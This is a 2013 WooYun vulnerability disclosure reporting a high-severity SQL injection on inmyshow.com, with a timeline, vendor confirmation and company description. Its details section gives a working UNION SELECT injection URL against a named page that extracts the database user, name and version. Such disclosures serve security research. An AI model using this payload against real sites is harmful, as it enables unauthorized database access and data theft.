WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027036

漏洞标题：天下秀官网root注入

相关厂商：inmyshow.com

漏洞作者： 么么哒

提交时间：2013-06-27 15:50

修复时间：2013-08-11 15:51

公开时间：2013-08-11 15:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2013-06-27： 细节已通知厂商并且等待厂商处理中
2013-06-27： 厂商已经确认，细节仅向厂商公开
2013-07-07： 细节向核心白帽子及相关领域专家公开
2013-07-17： 细节向普通白帽子公开
2013-07-27： 细节向实习白帽子公开
2013-08-11： 细节向公众公开

简要描述：

天下秀（InMyShow）是中国第一家专注于社交营销的专业化公司，公司专注于通过技术驱动，结合企业品牌目标需求，为企业提供一站式社交营销解决方案，满足企业的社交营销需求。公司拥有自主知识产权的社交营销分析系统及社交营销企业级引擎，以此来实现企业品牌快速由传统网络营销向社交营销平滑提升，从而大大提升企业的社交营销效果。
目前，我们已为汽车、IT数码、快消、生活用品、金融、通讯行业的150个知名品牌，管理了超过2400万的社交用户。 社交营销将是未来企业品牌网络营销的重构基础，帮助企业品牌大量的沉淀社交用户并有效的实现了企业品牌潜在用户向现实消费者的融合。

详细说明：

http://www.inmyshow.com/home/read.php?id=58%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),NULL#

漏洞证明：

修复方案：

版权声明：转载请注明来源 么么哒@乌云

漏洞回应